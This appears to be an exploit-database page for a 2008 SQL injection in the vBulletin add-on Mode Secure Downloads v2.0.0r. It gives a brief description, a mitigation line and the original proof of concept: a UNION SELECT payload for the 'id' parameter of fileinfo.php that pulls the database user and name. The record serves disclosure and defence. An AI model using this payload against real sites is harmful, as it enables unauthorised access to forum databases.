header-logo
Suggest Exploit
vendor:
Mode Secure Downloads
by:
Cn4phux
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mode Secure Downloads
Affected Version From: vBulletin (Mode Secure Downloads v2.0.0r)
Affected Version To: vBulletin (Mode Secure Downloads v2.0.0r)
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability

A SQL injection vulnerability exists in vBulletin (Mode Secure Downloads v2.0.0r) which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'fileinfo.php' script. This can be exploited to gain access to sensitive information from the database, modify data, or execute arbitrary SQL commands.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

[~] vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability

[~] Mod : http://www.1src.com/freeware/download.php?id=1880

[~] Author : Cn4phux

[~] PoC :

 

[~] URL.com/fileinfo.php?id=[SQL]


[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0


//Cn4phux.

# milw0rm.com [2008-12-08]

Navigation

Suggest Exploit

Services By CQR